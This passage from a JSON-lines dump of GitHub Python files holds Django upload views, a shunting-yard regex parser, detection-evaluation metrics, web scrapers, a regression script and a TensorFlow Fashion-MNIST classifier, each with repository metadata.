pair_symbols_for_input[args.symbol]\n pair_lst = []\n for pairsym in pair_set:\n insym, outsym = cfg.pairsym2sympair(pairsym)\n pair_lst.append((insym, outsym))\n if cfg.verbosity >= 10:\n print(\"pair_lst:\", pair_lst)\n else:\n pair_lst = sorted(cfg.symbol_pair_set)\n\n for insym, outsym in pair_lst:\n if len(pair_symbols_for_input[insym]) <= 1:\n continue\n pair_symbol = cfg.sympair2pairsym(insym, outsym)\n posi_contexts, nega_contexts = relevant_contexts(pair_symbol)\n pos_contexts, neg_contexts = minimal_contexts(pair_symbol,\n posi_contexts.copy(),\n nega_contexts.copy())\n if len(pos_contexts) <= len(neg_contexts) or cfg.verbosity > 0:\n print_rule(pair_symbol, \"=>\", pos_contexts)\n else:\n print_rule(pair_symbol, \"/<=\", neg_contexts)\n if args.verbosity >= 5:\n for lc, rc in posi_contexts:\n l_str = context_to_output_str(lc)\n r_str = context_to_output_str(rc)\n print(\"{:>30}<{}>{}\".format(l_str, outsym, r_str))\n","repo_name":"koskenni/pytwolc","sub_path":"twdiscov.py","file_name":"twdiscov.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"38338190662","text":"# ! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport datetime\nimport os\nimport json\nimport importlib\nfrom multiprocessing import Process\nimport time\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db import connection\nfrom oauthlib.oauth2.rfc6749.tokens import random_token_generator\nfrom django.db import transaction as db_transaction\nfrom django.template.loader import get_template\nfrom django.core.files import File\nimport pathlib2 as pathlib\nfrom django.utils import timezone\n\nfrom el_t01.settings import MEDIA_ROOT, BASE_DIR\n\nfrom el_t01_app.service.service import get_main_args\nfrom el_t01_app.models import Profile, Devices_list, Ticket_type, Device_history\n\nimport requests\nfrom el_t01.env import TOKEN_DEVICE, TOKEN_SERVER, URL_PHOTO, URL_RESULT, URL_FREE\n\n# from rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import permissions\nfrom rest_framework import status\n\nclass CustomerAccessPermission(permissions.BasePermission):\n message = 'Adding customers not allowed.'\n\n def has_permission(self, request, view):\n print (\"has_permission --\")\n # body_unicode = request.body.decode('utf-8')\n # try:\n # body = json.loads(body_unicode)\n # except:\n # body = {}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n print (\"m_token = \", m_token)\n m_Devices_list = Devices_list.objects.filter(api_token=m_token)\n if m_Devices_list.count() > 0:\n m_Devices_list = m_Devices_list[0]\n return True\n else:\n return False\n\nclass FileUploadView_Vvs(APIView):\n print (\"FileUploadView_Vvs\")\n permission_classes = [CustomerAccessPermission]\n # parser_classes = (FileUploadView_Vvs, )\n\n def post(self, request, format='jpg'):\n m_return = {\"status\": \"error\"}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n m_jellyfish_type = m_headers.get(\"JellyfishType\", \"\")\n m_ticket_type = m_headers.get(\"TicketType\", \"\")\n m_ticketid = m_headers.get(\"TicketId\", \"\")\n\n print (\"m_token = \", m_token )\n print (\"m_jellyfish_type = \", m_jellyfish_type )\n print (\"m_ticket_type = \", m_ticket_type )\n print (\"m_ticketid = \", m_ticketid )\n\n # если новая система - ищем запись\n # если старвя система - создаем запись\n\n # найти запись в истории\n try:\n t_ticket_history = Device_history.objects.get(id=m_ticketid)\n except:\n pass\n\n m_Devices_list = Devices_list.objects.filter(api_token=m_token)\n print (\"m_Devices_list.count() = \", m_Devices_list.count() )\n # ToDo\n if m_Devices_list.count() > 0:\n m_Devices_item = m_Devices_list[0]\n else:\n m_Devices_item = None\n\n if m_Devices_item is not None:\n if request.FILES:\n print (\"FILES YES\")\n if 'image' in request.FILES:\n file_to_upload = request.FILES['image']\n m_time_now = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M%S\")\n m_dir_short = os.path.join('media', 'ticket_in', str(m_Devices_item.id))\n m_file_name = \"in_{}_{}_{}.png\".format(m_ticketid, m_ticket_type, m_time_now )\n m_file_short = os.path.join(m_dir_short, m_file_name)\n m_dir_full = os.path.join(BASE_DIR, m_dir_short)\n m_file_full = os.path.join(m_dir_full, m_file_name)\n print (\"m_file_full = \", m_file_full)\n file_in = File(file_to_upload)\n with open(m_file_full, 'wb+') as file_out:\n for chunk in file_in.chunks():\n file_out.write(chunk)\n\n m_return = {\"status\": \"ok\"}\n\n if t_ticket_history.game_type.verbal == \"01\":\n from el_t01_app.service.v003.def_ticket_01 import TicketJob\n elif t_ticket_history.game_type.verbal == \"02\":\n from el_t01_app.service.v003.def_ticket_02 import TicketJob\n elif t_ticket_history.game_type.verbal == \"03\":\n from el_t01_app.service.v003.def_ticket_03 import TicketJob\n elif t_ticket_history.game_type.verbal == \"04\":\n from el_t01_app.service.v003.def_ticket_04 import TicketJob\n elif t_ticket_history.game_type.verbal == \"05\":\n from el_t01_app.service.v003.def_ticket_05 import TicketJob\n\n if m_ticket_type == \"01\":\n t_ticket_history.img_01 = m_file_short\n t_ticket_history.step_ticket = m_ticket_type\n t_ticket_history.save()\n ItemJob = TicketJob(item_ticket_job=t_ticket_history)\n m_return = ItemJob.run_job_01()\n\n if m_ticket_type == \"02\":\n t_ticket_history.img_02 = m_file_short\n t_ticket_history.step_ticket = m_ticket_type\n t_ticket_history.save()\n ItemJob = TicketJob(item_ticket_job=t_ticket_history)\n m_return = ItemJob.run_job_02()\n\n else:\n print (\"FILES NO\")\n\n return Response(m_return)\n\n\nclass Tickets_Get_Vvs(APIView):\n print (\"Tickets_Get_Vvs\")\n permission_classes = [CustomerAccessPermission]\n # parser_classes = (FileUploadView_Vvs, )\n\n def post(self, request, format='jpg'):\n m_return = {\"status\": \"error\"}\n m_headers = request.headers\n m_token = m_headers.get(\"Token\", \"\")\n m_jellyfish_type = m_headers.get(\"JellyfishType\", \"\")\n m_ticket_type = m_headers.get(\"TicketType\", \"\")\n m_ticketid = m_headers.get(\"TicketId\", \"\")\n\n try:\n m_Devices_item = Devices_list.objects.get(api_token=m_token)\n except:\n return Response([])\n\n ## api_token\n\n print (\"m_token = \", m_token )\n print (\"m_jellyfish_type = \", m_jellyfish_type )\n print (\"m_ticket_type = \", m_ticket_type )\n print (\"m_ticketid = \", m_ticketid, type(m_ticketid) )\n\n body_unicode = request.body.decode('utf-8')\n print (\"body_unicode = \", body_unicode )\n body_data = json.loads(body_unicode)\n print (\"body_data = \", body_data )\n m_tickets_in = body_data.get('JobTickets',[])\n print (\"m_tickets_in = \", m_tickets_in )\n\n m_device_ticket_list = []\n for item_ticket in m_tickets_in:\n t_history = Device_history()\n t_history.req_id = item_ticket\n t_history.req_dt = timezone.now()\n t_history.step_job = \"\"\n t_history.type_ticket = m_Devices_item.t_type.verbal\n t_history.status = \"00\"\n t_history.type_jellyfish = \"02\"\n t_history.t_dev_id = m_Devices_item.id\n t_history.save()\n m_device_ticket_list.append(t_history.id)\n\n t_history.send_free = True\n t_history.save()\n\n m_return = {\"status\": \"ok\", \"ticket_list\": m_device_ticket_list}\n return Response(m_return)\n","repo_name":"Never11n/el_t01","sub_path":"el_t01_app/views_vvs_rest.py","file_name":"views_vvs_rest.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30532545034","text":"# https://leetcode.com/problems/basic-calculator/solutions/1662949/python-actually-working-shunting-yard-that-passes-all-edge-cases/\n\nfrom machine import Stack\nimport re\nEPSILON = 'ε'\nPRECEDENCE = {'|': 1, '%': 1, '?': 2, '@': 2, '#': 2}\n\n\n# Shunting Yard algorithm\ndef shunting_yard(expression):\n postfix = ''\n tempStack = []\n formatted_regex = clean_regex(expression)\n print(formatted_regex)\n for char in formatted_regex:\n if char == '(':\n tempStack.append(char)\n elif char == ')':\n while tempStack[-1] != '(':\n postfix += tempStack.pop()\n tempStack.pop()\n # Operator\n else:\n while len(tempStack) > 0:\n top_char = tempStack[-1]\n current_char_precedence = get_precedence(char)\n top_char_precedence = get_precedence(top_char)\n if top_char_precedence >= current_char_precedence:\n postfix += tempStack.pop()\n else:\n break\n tempStack.append(char)\n while tempStack:\n # Processing the postfix\n postfix += tempStack.pop()\n return postfix\n\n\n# We need to explicitly include '.' between concats\n# This is needed to create valid postfix expressions for shunting yard\ndef clean_regex(expression):\n ans = ''\n # Both of the ones below can be extended to support many operation types (*/** etc)\n ops = set(['?', '#', '|', '@', '%'])\n bOps = set(['|', '%'])\n for i in range(len(expression)):\n char1 = expression[i]\n if i + 1 < len(expression):\n char2 = expression[i + 1]\n ans += char1\n if char1 != '(' and char2 != ')' and char2 not in ops and char1 not in bOps:\n ans += '%'\n ans += expression[-1]\n return ans\n\n\n\"\"\"\n this is needed to create valid postfix expressions for shunting yard\n eg: 1 - (-2) creates a postfix of 1 2 - - which is invalid\n instead we convert to 1 0 2 - -\n\"\"\"\n\n\ndef get_precedence(char):\n return PRECEDENCE.get(char, 6)\n\n\n# Shunting Yard algorithm\nclass ShuntingYard:\n\n # Operator precedence dictionary\n PRECEDENCE = {'|': 1, '%': 1, '?': 2, '@': 2, '#': 2}\n OPERATORS = set(PRECEDENCE.keys())\n SYMBOLS = OPERATORS.union({'(', ')', EPSILON})\n\n def __init__(this):\n this.stack = Stack()\n this.output = []\n this.post_result = \"\"\n\n def concatenation(this, regex):\n reg_len = len(regex) - 1\n symbols = set([\"(\", \"|\", \"?\", \"#\", \"%\", \"@\", \")\"])\n result = []\n for i in range(reg_len):\n result.append(regex[i])\n if regex[i] not in symbols and (regex[i+1] not in symbols or regex[i+1] == '('):\n result.append(\"%\")\n else:\n case = {\n regex[i] in {\"@\", \"?\", \")\"} and regex[i+1] == \"(\": \"%\",\n regex[i] in {\"@\", \"?\", \"#\", \")\"} and regex[i+1] not in symbols: \"%\",\n }.get(True, \"\")\n result.append(case)\n result.append(regex[reg_len])\n return \"\".join(result)\n\n def revision(this, char):\n try:\n a = this.PRECEDENCE[char]\n b = this.PRECEDENCE[this.stack.peek()]\n return a <= b if a >= 0 and b >= 0 else False\n except KeyError:\n return False\n\n def to_postfix(this, regex):\n exp = this.concatenation(regex)\n for i in exp:\n if i.isalnum() or i == EPSILON:\n if this.stack.peek() in (\"@\", \"#\", \"?\"):\n this.output.append(this.stack.pop())\n this.output.append(i)\n elif i == '(':\n this.stack.push(i)\n elif i == ')':\n while not this.stack.is_empty() and this.stack.peek() != '(':\n a = this.stack.pop()\n this.output.append(a)\n if this.stack.is_empty() or this.stack.peek() != '(':\n return -1\n else:\n this.stack.pop()\n else:\n while not this.stack.is_empty() and this.revision(i):\n this.output.append(this.stack.pop())\n this.stack.push(i)\n while not this.stack.is_empty():\n this.output.append(this.stack.pop())\n this.post_result = \"\".join(this.output)\n return this.post_result\n","repo_name":"DavidDLM/Lab-D-Lenguajes","sub_path":"postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71190856158","text":"from sklearn.metrics import average_precision_score\nimport numpy as np\nimport pandas as pd\nimport geopandas as gpd\nfrom deepforest.utilities import check_file\nfrom deepforest import IoU\nfrom shapely.geometry import box\n\n\n\n\ndef evaluate(m, csv='val_samples/val_samples.csv', folder=\"./val_samples\"):\n results = m.evaluate(csv, folder)\n p = results['box_precision']\n r = results['box_recall']\n\n if (p + r) == 0:\n f1 = 0\n else:\n f1 = 2 * p * r / (p + r)\n return results, f1, results['AP']\n\n\ndef evaluate_image(predictions, ground_df):\n \"\"\"\n Compute intersection-over-union matching among prediction and ground truth boxes for one image\n Args:\n df: a pandas dataframe with columns name, xmin, xmax, ymin, ymax, label. The 'name' column should be the path relative to the location of the file.\n summarize: Whether to group statistics by plot and overall score\n Returns:\n result: pandas dataframe with crown ids of prediciton and ground truth and the IoU score.\n \"\"\"\n plot_names = predictions[\"image_path\"].unique()\n if len(plot_names) > 1:\n raise ValueError(\"More than one plot passed to image crown: {}\".format(plot_name))\n else:\n plot_name = plot_names[0]\n\n predictions['geometry'] = predictions.apply(\n lambda x: box(x.xmin, x.ymin, x.xmax, x.ymax), axis=1)\n predictions = gpd.GeoDataFrame(predictions, geometry='geometry')\n\n ground_df['geometry'] = ground_df.apply(\n lambda x: box(x.xmin, x.ymin, x.xmax, x.ymax), axis=1)\n ground_df = gpd.GeoDataFrame(ground_df, geometry='geometry')\n\n # match\n result = IoU.compute_IoU(ground_df, predictions)\n\n # add the label classes\n result[\"predicted_label\"] = result.prediction_id.apply(lambda x: predictions.label.loc[x] if pd.notnull(x) else x)\n result[\"true_label\"] = result.truth_id.apply(lambda x: ground_df.label.loc[x])\n result['predicted_area'] = predictions['geometry'].apply(lambda x: x.area)\n return result\n\n\ndef evaluate2(predictions,\n ground_df,\n root_dir,\n iou_threshold=0.4):\n \"\"\"\n Takes as an input the prediction and ground trouth to compute IoU for predictions and calculate AP\n Args:\n predictions: a pandas dataframe, if supplied a root dir is needed to give the relative path of files in df.name. The labels in ground truth and predictions must match. If one is numeric, the other must be numeric.\n ground_df: a pandas dataframe, if supplied a root dir is needed to give the relative path of files in df.name\n root_dir: location of files in the dataframe 'name' column.\n Returns:\n results: a dataframe of match bounding boxes\n box_recall: proportion of true positives of box position, regardless of class\n box_precision: proportion of predictions that are true positive, regardless of class\n class_recall: a pandas dataframe of class level recall and precision with class sizes\n AP: average precision\n \"\"\"\n\n check_file(ground_df)\n check_file(predictions)\n\n # Run evaluation on all plots\n results = []\n box_recalls = []\n box_precisions = []\n recalls = []\n precisions = []\n for image_path, group in ground_df.groupby(\"image_path\"):\n # clean indices\n image_predictions = predictions[predictions[\"image_path\"] == image_path].reset_index(drop=True)\n\n # If empty, add to list without computing IoU\n if image_predictions.empty:\n result = pd.DataFrame(\n {\"truth_id\": group.index.values, \"prediction_id\": None, \"IoU\": 0, \"predicted_label\": None,\n \"score\": None, \"match\": None, \"true_label\": group.label})\n # An empty prediction set has recall of 0, precision of NA.\n box_recalls.append(0)\n results.append(result)\n continue\n else:\n group = group.reset_index(drop=True)\n result = evaluate_image(predictions=image_predictions,\n ground_df=group)\n\n result[\"image_path\"] = image_path\n result['IoU'] = result['IoU'].fillna(0)\n result[\"match\"] = result.IoU > iou_threshold\n true_positive = sum(result[\"match\"])\n recall = true_positive / result.shape[0]\n precision = true_positive / image_predictions.shape[0]\n box_recalls.append(recall)\n box_precisions.append(precision)\n results.append(result)\n\n results = pd.concat(results)\n box_precision = np.mean(box_precisions)\n box_recall = np.mean(box_recalls)\n\n # Per class recall and precision\n class_recall_dict = {}\n class_precision_dict = {}\n class_size = {}\n\n box_results = results[results.predicted_label.notna()]\n if box_precision > 0 and box_recall > 0:\n results2 = results.dropna(subset=['score'])\n results2['match'] = results2.IoU > iou_threshold\n AP = average_precision_score(results2['match'], results2['score'])\n else:\n AP = 0\n if box_results.empty:\n print(\"No predictions made\")\n box_recall = 0\n box_precision = 0\n class_recall = pd.DataFrame()\n return {\"results\": results, \"box_precision\": box_precision, \"box_recall\": box_recall,\n \"class_recall\": class_recall, 'AP': 0}\n\n for name, group in box_results.groupby(\"true_label\"):\n class_recall_dict[name] = sum(group.true_label == group.predicted_label) / group.shape[0]\n number_of_predictions = group[group.predicted_label == name].shape[0]\n if number_of_predictions == 0:\n class_precision_dict[name] = 0\n else:\n class_precision_dict[name] = sum(group.true_label == group.predicted_label) / number_of_predictions\n class_size[name] = group.shape[0]\n\n class_recall = pd.DataFrame({\"label\": class_recall_dict.keys(), \"recall\": pd.Series(class_recall_dict),\n \"precision\": pd.Series(class_precision_dict),\n \"size\": pd.Series(class_size)}).reset_index(drop=True)\n\n return {\"results\": results, \"box_precision\": box_precision, \"box_recall\": box_recall, \"class_recall\": class_recall,\n \"AP\": AP}\n\n","repo_name":"DeadmanIQ445/maskrcnn_v2","sub_path":".ipynb_checkpoints/evaluation-checkpoint.py","file_name":"evaluation-checkpoint.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30075145503","text":"from requests.adapters import HTTPAdapter\n#from requests.packages.urllib3.util.retry import Retry\nfrom urllib3.util import Retry\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport tkinter as tk\nlogin = 'login'\npassword = 'password'\n\ndef requests_retry_session(\n retries=30,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n return session\n\n\ndef get_html(url):\n headers = {\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n }\n\n values = {'login': login,\n 'password': password\n }\n with requests.Session() as sesh:\n #response = requests_retry_session(session=s).get('https://www.peterbe.com')\n r = requests_retry_session(session=sesh).get(url, headers=headers)\n r = requests_retry_session(session=sesh).post(url, data=values)\n r = requests_retry_session(session=sesh).get(\"http://172.11.1.11:8080/published?uuid=fctsListView\")\n return r.text\n\ndef bs4Soup(html):\n soup = BeautifulSoup(html, 'lxml')\n html_list = soup.find_all('span')\n list1 = []\n dicct = {}\n for i in html_list:\n list = re.findall(r'[А-яA-z]+|[0-9]+', i.text)\n txt = \" \".join(list)\n if \"СПБ\" in txt or txt.isdigit() == True:\n list1.append(txt)\n\n print(len(list1))\n print(list1)\n\n for y in range(1,60,3):\n try:\n dicct[list1[y]] = list1[y+1]\n except:\n pass\n\n string = \"\"\n global amount\n amount = 0\n for key in dicct:\n dicct[key] = int(dicct[key])\n amount += dicct[key]\n print(key + \" - \" + str(dicct[key]))\n print(key.replace(\"СПБ\", \"\").replace('МЕД', '').replace(\"Очередь\", '').replace('проекта', '')\\\n .replace('1', '').replace('2', '').replace('3', '').strip() + \" - \" + str(dicct[key]))\n string += key.replace(\"СПБ\", \"\").replace('МЕД', '').replace(\"медицинская\", \"мед.\").replace(\"Консультация\", \"Конс.\").replace(\"приложению\", \"��рил.\").replace(\"Очередь\", '').replace('проекта', '')\\\n .replace('1', '').replace(\"Общая очередь Xup\", \"Xoup\").replace('2', '').replace('3', '').strip() + \" - \" + str(dicct[key]) + \"\\n\"\n #string += key.replace(\"Общая очередь Xoup\", 'Xoup')\n return string + \"\\n\" + \"Всего - \" + str(amount)\n\ndef main():\n url = \"http://172.11.1.11:8080/\"\n bs4Soup(get_html(url))\n\ndef Draw():\n global text\n frame=tk.Frame(window,width=1000,height=1000,bd=100,bg ='#a9aeb0')\n frame.place(relx=.5, rely=.5, anchor=\"center\")\n text=tk.Label(window)\n text.pack(fill = 'both', expand=True)\n\ndef Refresher():\n url = \"http://172.11.1.11:8080/\"\n global text\n try:\n if int(bs4Soup(get_html(url))[-4:]) > 50:\n bg = '#eb6788'\n elif int(bs4Soup(get_html(url))[-4:]) > 70:\n bg = '#e3869d'\n else:\n #bg = '#333333'\n bg = '#a9aeb0'\n except:\n #bg = '#333333'\n bg = '#a9aeb0'\n text.configure(text=bs4Soup(get_html(url)), font=(\"Verdana\", 55, \"bold\"), fg=\"black\", bg=bg)\n #fg='#CCCCCC'\n window.after(5000, Refresher) # every second...\n\nwindow = tk.Tk()\nwindow.title(\"Гарант\")\nwindow.geometry(\"518x170\")\nwindow.configure(background='#333333')\n#window.configure(background='#a9aeb0')\nwindow.wm_attributes('-fullscreen', True) # Windows\n#window.attributes('-zoomed', True)\n\nDraw()\nRefresher()\nwindow.mainloop()\n","repo_name":"Mythological/Python-BS4-ParseNaumen","sub_path":"NaumenQueue.py","file_name":"NaumenQueue.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73777961439","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import KFold\n\ntrain_data = pd.read_csv('dataset/train.csv')\ntest_data = pd.read_csv('dataset/test.csv')\n\n# 결측치 확인 함수\ndef check_missing_col(dataframe):\n missing_col = []\n counted_missing_col = 0\n for i, col in enumerate(dataframe.columns):\n missing_values = sum(dataframe[col].isna())\n is_missing = True if missing_values >= 1 else False\n if is_missing:\n counted_missing_col += 1\n print(f'결측치가 있는 칼럼은: {col}입니다')\n print(f'해당 칼럼에 총 {missing_values}개의 결측치가 존재합니다')\n missing_col.append([col, dataframe[col].dtype])\n if counted_missing_col == 0:\n print('결측치가 존재하지 않습니다.')\n return missing_col\n\n# 데이터 확인\ntrain_missing_col = check_missing_col(train_data)\n\ntrain_preprocessed = train_data.dropna(subset=['Sex'])\ntrain_preprocessed = train_preprocessed.fillna(0)\n\ntrain_missing_col = check_missing_col(train_preprocessed)\n\ndef make_label_map(dataframe):\n label_maps = {}\n for col in dataframe.columns:\n if dataframe[col].dtype == 'object':\n label_map = {'unknown':0}\n for i, key in enumerate(train_data[col].unique()):\n label_map[key] = i + 1\n label_maps[col] = label_map\n return label_maps\n\ndef label_encoder(dataframe, label_map):\n for col in dataframe.columns:\n if dataframe[col].dtype == 'object':\n dataframe[col] = dataframe[col].map(label_map[col])\n dataframe[col] = dataframe[col].fillna(label_map[col]['unknown'])\n return dataframe\n\nlabel_map = make_label_map(train_preprocessed)\nlabeled_train = label_encoder(train_preprocessed, label_map)\n\nprint(label_map)\n\ndef RMSE(true, pred):\n score = np.sqrt(np.mean(np.square(true-pred)))\n return score\n\ntarget = labeled_train[\"Body Mass (g)\"]\nfeature = labeled_train.drop(['id', 'Body Mass (g)'], axis=1)\n\nlr = LinearRegression()\n\nkfold = KFold(n_splits=5)\n\ncv_rmse = [] # 각 cv회차의 rmse 점수를 계산하여 넣어줄 리스트를 생성합니다. 이후 RMSE값의 평균을 구하기 위해 사용됩니다.\nn_iter = 0 # 반복 횟수 값을 초기 설정해줍니다. 이후 프린트문에서 각 교차검증의 회차를 구분하기 위해 사용됩니다.\n\n# K값이 5이므로 이 반복문은 5번 반복하게 됩니다.\nfor train_index, test_index in kfold.split(feature): # feautres 데이터를 위에서 지정한 kfold 숫자로 분할합니다. 인덱스 값을 분할해줍니다.\n x_train, x_test = feature.iloc[train_index], feature.iloc[test_index] # feature로 사용할 값을 나눠진 인덱스값에 따라 설정합니다.\n y_train, y_test = target.iloc[train_index], target.iloc[test_index] # label로 사용할 값을 나눠진 인덱스값에 따라 설정합니다.\n\n lr = lr.fit(x_train, y_train) # 모델 학습\n pred = lr.predict(x_test) # 테스트셋 예측\n n_iter += 1 # 반복 횟수 1회 증가\n\n error = RMSE(y_test, pred) # RMSE 점수를 구합니다.\n train_size = x_train.shape[0] # 학습 데이터 크기\n test_size = x_test.shape[0] # 검증 데이터 크기\n\n print('\\n{0}번째 교차 검증 RMSE : {1}, 학습 데이터 크기 : {2}, 검증 데이터 크기 : {3}'\n .format(n_iter, error, train_size, test_size))\n print('{0}번째 검증 세트 인덱스 : {1}'.format(n_iter, test_index))\n cv_rmse.append(error)\n\nprint('\\n==> 이 방정식의 평균 에러(RMSE)는 {} 입니다.'.format(np.mean(cv_rmse))) # 모델의 평균정확도를 확인합니다.\n\ntest_missing_col = check_missing_col(test_data)\n\ntest_data['Sex'] = test_data['Sex'].fillna(\"MALE\")\ntest_preprocessed = test_data.fillna(0)\n\ntest_missing_col = check_missing_col(test_preprocessed)\n\nlabeled_test = label_encoder(test_preprocessed, label_map)\n\nlabeled_test = labeled_test.drop(['id'], axis=1)\n\npredict_test = lr.predict(labeled_test)\nprint(predict_test)\n\nsubmission = pd.read_csv('dataset/sample_submission.csv')\nsubmission['Body Mass (g)'] = predict_test\n\nsubmission.to_csv(\"submission.csv\", index=False)","repo_name":"dntjq0815/Penguins_Weight_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69983564640","text":"from os import getcwd, rename, remove, makedirs\nfrom os.path import isfile, exists\nfrom pathlib import Path\n\n\ndef validar_diretorio_downloads():\n\n diretorio = str(Path(getcwd(), 'downloads'))\n\n if not exists(diretorio):\n makedirs(diretorio)\n\n\ndef retornar_full_path_downloads():\n\n return str(Path(getcwd(), 'downloads'))\n\n\ndef renomear_download(cnes):\n\n caminho_arquivos = str(Path(getcwd(), 'downloads'))\n nome_antigo = str(Path(caminho_arquivos, 'fichaCompletaEstabelecimento.pdf'))\n\n if isfile(nome_antigo):\n\n nome_atual = cnes + '.pdf'\n nome_novo = str(Path(caminho_arquivos, nome_atual))\n\n try:\n rename(nome_antigo, nome_novo)\n except Exception:\n remove(nome_antigo)\n","repo_name":"lleooNS/PRIME_ROBOT_CHALLENGE","sub_path":"libraries/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32083456460","text":"from webscrapper_class_freesound import get_page_number as PG\nfrom webscrapper_class_freesound import get_page_content as GC\nfrom credentials import USERNAME, PASSWORD, host, db_user, db_password, db_name\nfrom webscrapper_class_freesound import sample_more_search_result as SR\nfrom webscrapper_class_freesound import get_sound_link as SL\nfrom pprint import pprint as p\nfrom webscrapper_class_freesound import sample_page_number as SM\nfrom webscrapper_class_freesound import get_file_meta as FM\nfrom webscrapper_mysql_libraries_freesound import *\n\ndb = connection(host, db_user, db_password, db_name)\n\nif check_table_if_exists(db) == 1146:\n create_table(db)\nelse:\n print('Table already exists!')\n\npage_nr = PG('https://www.freesound.org/search/?q=&page=1#sound')\n\npage_nr = int(page_nr)\n\nprint(page_nr)\n\ncurr_page = input(\"Page number to start!\")\ncurr_page = int(curr_page)\n\nerror_link_array = []\n\ndef mainLoop(curr_page):\n\n while curr_page <= page_nr:\n\n try:\n print(str(curr_page) + ' -> current page')\n\n page_content = GC('https://www.freesound.org/search/?q=&page=' + str(curr_page) + '#sound',\n error_link_array)\n\n sample_links = SR('https://www.freesound.org/search/?q=&page=' + str(curr_page) + '#sound')\n\n sample_content = []\n\n sound_array = []\n\n for sam in sample_links:\n if SM(sam) is not None:\n page_size = int(SM(sam))\n else:\n page_size = 1\n\n print(str(page_size) + ' -> number of pages')\n\n curr_sample_page = 1\n\n while curr_sample_page <= page_size:\n sample_content.append(\n GC(sam + '&advanced=&page=' + str(curr_sample_page) + '#sound', error_link_array))\n curr_sample_page += 1\n\n if page_content is not None:\n sound_array.append(SL(page_content))\n\n for sound in sample_content:\n if sound is not None:\n sound_array.append(SL(sound))\n\n for ss in sound_array:\n if ss is not None:\n for sounds in ss:\n meta_data = FM(sounds)\n insert_into_table(db, meta_data)\n except:\n print(curr_page)\n continue\n\n curr_page += 1\n\nmainLoop(curr_page)\n\ndestroy_connection(db)","repo_name":"terror2012/music_scrapper","sub_path":"webscrapper_main_freesound.py","file_name":"webscrapper_main_freesound.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8604030826","text":"# -*-coding: utf-8-*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nprint(tf.__version__)\n\n\n# 加载官方数据,加载速度会受网络环境影响\ndef load_fashion_mnist():\n fashion_mnist = keras.datasets.fashion_mnist\n (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n # Explore数据\n print('train_images_shape:', train_images.shape)\n print('train_labels:', train_labels)\n print('train_labels_length:', len(train_labels))\n print('test_images_shape:', test_images.shape)\n print('test_images_length:', len(test_labels))\n\n # 归一化\n train_images = train_images / 255.0\n test_images = test_images / 255.0\n\n return train_images, train_labels, test_images, test_labels\n\n\ndef build_model():\n # 使用TensorFlow2.0 提供的KerasAPI构建模型\n model = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dense(10, activation='softmax')\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n\nif __name__ == \"__main__\":\n # 数据标签种类\n class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n # 模型保存路径\n OUTPUT_PATH = '/home/output'\n # 批次大小\n BATCH_SIZE = 64\n # 迭代次数\n EPOCHS = 10\n\n # 加载数据\n train_images, train_labels, test_images, test_labels = load_fashion_mnist()\n\n # 搭建模型\n model = build_model()\n\n # 训练\n model.fit(train_images, train_labels, epochs=EPOCHS, batch_size=BATCH_SIZE)\n\n # 评估模型\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n print('\\n Test accuracy:', test_acc)\n\n # 保存模型\n model.save(OUTPUT_PATH)\n","repo_name":"aefuimn/TensorFlow2.0-Tutorial","sub_path":"classify_images/classify_images_of_clothing.py","file_name":"classify_images_of_clothing.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41172420349","text":"try:\n import onnx.backend.test\nexcept ImportError:\n raise ImportError(\"Onnx and protobuf need to be installed\")\n\nimport test_cases\nimport unittest\nimport backend as mxnet_backend\nimport logging\n\noperations = ['import', 